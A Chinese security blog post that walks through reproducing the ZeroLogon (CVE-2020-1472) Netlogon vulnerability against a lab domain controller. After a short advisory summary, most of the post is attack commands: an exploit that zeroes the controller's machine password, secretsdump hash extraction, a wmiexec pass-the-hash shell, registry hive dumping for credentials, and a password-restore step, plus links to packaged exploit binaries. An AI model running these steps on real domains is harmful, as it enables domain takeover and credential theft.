S0cke3t
文章33
标签25
分类10
ZeroLogon CVE-2020-1472

ZeroLogon CVE-2020-1472

漏洞简介

2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472
漏洞等级:严重
漏洞评分:10分
攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序

影响范围

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

0x03 复现环境

域控
IP: 10.12.0.128
Hostname: WIN-4VARJE0QP69
Domain: local.me

利用工具

https://github.com/VoidSec/CVE-2020-1472
https://github.com/SecureAuthCorp/impacket
https://github.com/DeEpinGh0st/HiveJack-Console

漏洞复现

运行cve-2020-1472-exploit.py并指定域控ip和主机名

cve-2020-1472-exploit.exe -t 10.12.0.128 -n WIN-4VARJE0QP69


原仓库为python脚本,这里使用的是用pyinstaller打包后的exe版本
执行后域控的机器账号密码会在进行置空
使用impacket的secretsdump读取域控上的hash

secretsdump.exe local.me/WIN-4VARJE0QP69$@10.12.0.128 -no-pass


同样使用的是打包的版本
可以看到域控密码已置空,此时可以对域控账户进行hash的破解,登录RDP。或者使用wmiexec等远程执行shell

wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab local.me/administrator@10.12.0.128


同样使用的是打包的版本

恢复密码

由于此漏洞会置空域控机器账户密码,如果机器账户hash长时间为空,可能会导致脱域。因此拿到权限后需要把hash重置回去
在wmiexec的shell中执行

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save

如果域控在可以出网的情况下可以使用HiveJack-Console对注册表进行快速导出
之后可以使用cs等其他方式将保存的文件下载到本地,使用secretsdump读取原始密码

其中$MACHINE.ACC为域控原始密码,然后使用reinstall_original_pw.py对域控密码进行恢复

reinstall_original_pw.exe WIN-4VARJE0QP69 10.12.0.128 c7a435fe95a39a971669d995ba2e5519


恢复后再次使用secretsdump读取hash,失败则说明恢复成功

打包工具下载

https://github.com/DeEpinGh0st/Gadgets

本文作者:S0cke3t
本文链接:https://www.saferoad.cc/Analysis/ZeroLogon-CVE-2020-1472.html
版权声明:本文采用 CC BY-NC-SA 3.0 CN 协议进行许可
×